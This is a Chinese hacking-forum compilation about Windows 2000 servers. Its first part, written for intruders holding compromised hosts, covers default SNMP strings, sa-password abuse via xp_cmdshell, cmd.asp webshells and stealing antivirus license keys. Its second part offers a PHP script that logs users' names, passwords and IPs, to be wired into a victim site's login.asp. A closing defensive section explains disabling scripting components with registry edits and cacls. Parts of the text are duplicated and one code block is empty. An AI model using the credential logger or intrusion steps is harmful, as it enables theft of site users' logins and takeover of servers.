在win2k下一旦安装了snmp服务,打开新的端口udp 161、dup 162。通过scan可以轻易的刺探到(推荐LANguard Network Scanner、它带有一个snmp浏览器,或者snscan.exe,一个强劲的snmp扫描器,那它找不同类型的肉鸡,比较方便)主要是口令默认,也别删除这个服务了,改了口令也算补上了,如何改?“服务”-“snmp service”-“属性页”-“安全”那个“接受团体名称”也就是“public”,它就是snmp访问口令。把它改成一个安全的口令。小心!一些暴力破解。这个漏洞,危害虽然没有那么直接,但还是有的,暴露系统的类型和具体的版本,获取帐号列表,运行服务信息.....。
Terminal service(3389) :主要是输入法状态条漏洞,虽然这个已经成了古董级的,但还是有的。有些肉鸡连sp1都没有。也不要去删什么帮助文件了。在注册表里-这个:HKEY_USERS/.DEFAULT/Keyboard Layout/Preload 这也就是登陆时可以用到的输入法。都在这里面,保留一个就可以了E00E0804 微软拼音,免得被人看出破绽。要是全删除了也就没有en图标了。打过sp2的,也不要忙了。补上了。此外,还有一个拒绝服务漏洞。这个没办法。只有打补丁,如果装了sp3也不要忙了,补上了。
ms-sql(tcp 1433 udp 1434): ms-sql这个服务涉及的漏洞也是比较多的,如果肉鸡没安装sp2,更多。
口令问题:sa这个帐号比较特别,不能改名字,也不能删除。加之安装时的“随意”。成了一个漏洞,口令太弱。通过一些小工具,连接以后调用系统存储过程xp-cmdshell,来执行命令。就算你禁用了存储过程xp-cmdshell。也是可以恢复的,就算恢复不了,通过写一些特别的asp文件(cmd.asp)到iis下有执行权限的目录,得到一个shell,最后结合一些local exploit。取得admin权限。 顺便说下,针对win2k+sp3的本地exploit已经有了。所以这个漏洞,没办法补,你不可能改sa口令,要不,等于买了自己,要不让它的asp脚本全部完蛋。这样的问题,永远都有的,像ipc$,本来设计来为了方便管理员管理计算机的。设置一个强壮的口令,本身就是很好的防御措施,就算是默认设置。又能怎么样!意识...
除外,ms-sql还有一个udp remote exploit和一些拒绝服务漏洞,这个没办法,只有打补丁,要是肉鸡装了sp3,不用忙了,补上了。
同行所留下的:
帐号,脚本,***,服务级后门,内核级后门。
帐号:
1.可能已经被先来的同行全部破解掉了,这个没办法,只能希望admin经常改口令。
2.***者添加的帐号,这个针对一些帐号特多的肉鸡,可能有人用这样低级的手法,你一样没办法,你没法判断到底是谁的帐号。
3.帐号被克窿。检查注册表,每个帐号的sid应该是对应的,比如guest的f5,01,如果是f4,01。被克窿了。要是觉得麻烦,用工具ca.exe来检查,只是要记得del掉%windir%/system32下的SASrv.exe,这是ca产生的。应该重点检查系统帐号,比如guest和IUSR_computername等。
4.注意的:有些帐号里来有"$"这个字符,这样的帐号在行命令下,将不会被显示。
脚本:
利用运行的web,这类后门找起来多少有点困难,比如被放了cmd.asp。名字不一定是这个,都会被改的。你要是想完美点,执行一下:regsvr32 scrrun.dll /u /s 那个cmd.asp文件也就没用了。也就是无法创建FileSystemObject 改回来:regsvr32 scrrun.dll /i /s 。此外,针对php、jsp、perl也一样有类似的脚本。找这类后门很困难。
***:
被中过马儿了,还好,一般比较好的服务器,都装有强力的杀毒软件,比如,Norton AntiVirus、kill nt版等。只是n久没升级了。提示下,顺便把它注册码给弄走(有些在注册表里,有些是一个文件)。都是正版的哦,绝对可以升级。:)。像这类后门只能依靠杀毒软件。种类实在太多了。
服务级后门: 这类后门找起来也即算容易,首先需要一些工具,pslist.exe pskill.exe、fport.exe、sc.exe、结合一些系统命令来找。netstat -an |more 看看端口,fport.exe 来查看端口所对应的程序。常用两种手法,直接加到服务里或者删掉一个系统里无关紧要的服务,在把后门伪装成刚刚哪个删掉的服务。找这类后门,只要你对系统服务和系统进程比较熟悉,应该不是很困难。
1.系统服务都是以大写字母开头的,并有规范的描述。(注意一些软件安装所产生的服务,比如serv-u)
2.系统服务对应的程序,都是版权信息的。(查看属性页)以及生成的时间。
3.端口,不太确定它是干什么用的时候,最好telnet下。
4.不能确定某个服务是干什么用的时候,也就不要del了(用sc.exe)。
内核后门:
这类后门在win2k下是比较少的,不像在*nix系统下,多的要死,比如用的比较爽的lkm后门,在win2k下这类后门不太成熟。弄不好让肉鸡彻底完蛋。我自己不太清楚,不多废话了。
别的废话:这个,只是我太无聊了,写起玩的。可能有用词不准确的或者错误。将就下了。本人工作也和计算机安全没有关系。要批评我的,随便了,我没意见。
前提,你必须有个php空间。
[url]http://www.512j.com/[/url]
在这里可以免费得到10MB的
假设我们的空间是 [url]http://test.512j.com/[/url]
在目录下建立一个文件a.php
代码
以下内容为程序代码:
[url]http://www.512j.com/[/url]
在这里可以免费得到10MB的
假设我们的空间是 [url]http://test.512j.com/[/url]
在目录下建立一个文件a.php
代码
以下内容为程序代码:
//a.php
$s="ceshi.txt";//密码保存为ceshi.txt
$fp=@fopen($s,"a+");//打开ceshi.txt,准备写咯。
$time = time();//获取时间 (登陆者)
$ip="$REMOTE_ADDR";//获取IP(登陆者)
$newfp= $time."|".$user."|".$password."|".$ip."|".chr(13).chr(10);//所有数据,时间,用户,密码,IP等等分别属于newfp
@fputs($fp,$newfp);//写newfp里的所有内容,@是用来屏蔽错误的!
@fclose($fp);//关闭ceshi.txt这个文件!
?>
然后修改对方的login.asp
这里不需要懂得任何语言!
在对方login.asp的最上面写就可以了!
以下内容为程序代码:
这样对方登陆之后站点的使用的帐号和密码就会保存在目录下的ceshi.txt里了!呵呵,保存格式为:
这是时间|帐号|密码|IP地址
这是方便将来写个页面把它读出来,以免记录大到打又打不开,删又删不了了就是很麻烦了!!!
呵呵,希望能给大家带来另外一种思路!!!
如果您的服务器正在受ASP***的困扰,那么希望这篇文章能帮您解决您所面临的问题。
目前比较流行的ASP***主要通过三种技术来进行对服务器的相关操作。
一、使用FileSystemObject组件
FileSystemObject可以对文件进行常规操作
可以通过修改注册表,将此组件改名,来防止此类***的危害。
HKEY_CLASSES_ROOT/Scripting.FileSystemObject/
改名为其它的名字,如:改为FileSystemObject_ChangeName
改名为其它的名字,如:改为FileSystemObject_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT/Scripting.FileSystemObject/CLSID/项目的值
HKEY_CLASSES_ROOT/Scripting.FileSystemObject/CLSID/项目的值
也可以将其删除,来防止此类***的危害。
注销此组件命令:RegSrv32 /u C:/WINNT/SYSTEM/scrrun.dll
禁止Guest用户使用scrrun.dll来防止调用此组件。
使用命令:cacls C:/WINNT/system32/scrrun.dll /e /d guests
使用命令:cacls C:/WINNT/system32/scrrun.dll /e /d guests
二、使用WScript.Shell组件
WScript.Shell可以调用系统内核运行DOS基本命令
可以通过修改注册表,将此组件改名,来防止此类***的危害。
HKEY_CLASSES_ROOT/WScript.Shell/
及
HKEY_CLASSES_ROOT/WScript.Shell.1/
改名为其它的名字,如:改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName
及
HKEY_CLASSES_ROOT/WScript.Shell.1/
改名为其它的名字,如:改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT/WScript.Shell/CLSID/项目的值
HKEY_CLASSES_ROOT/WScript.Shell.1/CLSID/项目的值
HKEY_CLASSES_ROOT/WScript.Shell/CLSID/项目的值
HKEY_CLASSES_ROOT/WScript.Shell.1/CLSID/项目的值
也可以将其删除,来防止此类***的危害。
三、使用Shell.Application组件
Shell.Application可以调用系统内核运行DOS基本命令
可以通过修改注册表,将此组件改名,来防止此类***的危害。
HKEY_CLASSES_ROOT/Shell.Application/
及
HKEY_CLASSES_ROOT/Shell.Application.1/
改名为其它的名字,如:改为Shell.Application_ChangeName或Shell.Application.1_ChangeName
及
HKEY_CLASSES_ROOT/Shell.Application.1/
改名为其它的名字,如:改为Shell.Application_ChangeName或Shell.Application.1_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT/Shell.Application/CLSID/项目的值
HKEY_CLASSES_ROOT/Shell.Application/CLSID/项目的值
HKEY_CLASSES_ROOT/Shell.Application/CLSID/项目的值
HKEY_CLASSES_ROOT/Shell.Application/CLSID/项目的值
也可以将其删除,来防止此类***的危害。
禁止Guest用户使用shell32.dll来防止调用此组件。
使用命令:cacls C:/WINNT/system32/shell32.dll /e /d guests
使用命令:cacls C:/WINNT/system32/shell32.dll /e /d guests
注:操作均需要重新启动WEB服务后才会生效。
四、调用Cmd.exe
禁用Guests组用户调用cmd.exe
cacls C:/WINNT/system32/Cmd.exe /e /d guests
通过以上四步的设置基本可以防范目前比较流行的几种***,但最有效的办法还是通过综合安全设置,将服务器、程序安全都达到一定标准,才可能将安全等级设置较高,防范更多非法***。
【转自世纪安全网 [url]http://www.21safe.com[/url]】